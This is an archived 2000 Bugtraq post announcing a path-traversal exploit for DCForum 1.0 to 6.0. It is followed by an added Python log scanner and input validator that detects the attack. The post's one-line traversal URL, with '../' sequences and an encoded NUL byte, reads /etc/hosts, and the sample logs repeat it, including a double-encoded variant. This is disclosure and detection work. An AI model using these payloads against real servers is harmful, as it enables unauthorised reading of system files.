[18367] in bugtraq
DCForum Exploit (1.0 - 6.0)
daemon@ATHENA.MIT.EDU (SteeLe)
Thu Dec 28 22:22:58 2000
Message-Id: PrivacyX-073633116-28773
Date: Thu, 28 Dec 2000 10:26:01 -0500
Reply-To: SteeLe <SteeLe@PRIVACYX.COM>
From: SteeLe <SteeLe@PRIVACYX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Here's a working exploit, don't know why I sent a script. I guess it was for the lazy people but anyway
simple exploitation:
http://localhost/dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/hosts%00
The vendor has been contacted long ago by the original founder of this bug CGISecurity.com. Before using the exploit there is information you should read for side effects and other things. CGISecurity.com wrote an advisory and it can be read at http://www.cgisecurity.com/advisory/2.txt
steeLe
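
The request above puts parent-directory sequences and an encoded NUL byte in the `forum` parameter. The following check for such requests in web server access logs is an added example, not part of the original post or of DCForum. The allowed forum-name pattern, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Assumption: legitimate forum identifiers are short names with no path characters.
SAFE_FORUM = re.compile(rb"[A-Za-z0-9_-]{1,64}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def decode_fully(raw, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e, %2500) is caught."""
    data = raw.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def forum_findings(request_target):
    """Return the reasons the 'forum' parameter of a request target is unsafe."""
    findings = []
    for pair in urlsplit(request_target).query.split("&"):
        name, _, value = pair.partition("=")
        if decode_fully(name) != b"forum":
            continue
        decoded = decode_fully(value)
        if b"\x00" in decoded:
            findings.append("NUL byte")
        if b".." in decoded:
            findings.append("parent-directory sequence")
        if b"/" in decoded or b"\\" in decoded:
            findings.append("path separator")
        if not findings and not SAFE_FORUM.fullmatch(decoded):
            findings.append("not an allowed forum name")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for each line with an unsafe forum value."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        found = forum_findings(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed sample access-log lines (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Dec/2000:10:26:01 -0500] "GET /dcforum/dcforum.cgi?az=list&forum=general HTTP/1.0" 200 5120',
    '192.0.2.44 - - [28/Dec/2000:10:27:13 -0500] "GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/hosts%00 HTTP/1.0" 200 312',
    '192.0.2.44 - - [28/Dec/2000:10:27:40 -0500] "GET /dcforum/dcforum.cgi?az=list&forum=%252e%252e%252fetc%252fhosts%2500 HTTP/1.0" 200 312',
]
```

`scan(SAMPLE_LOG)` flags the second and third lines; the same `forum_findings` test can serve as input validation in front of the CGI, rejecting any value that returns a non-empty list.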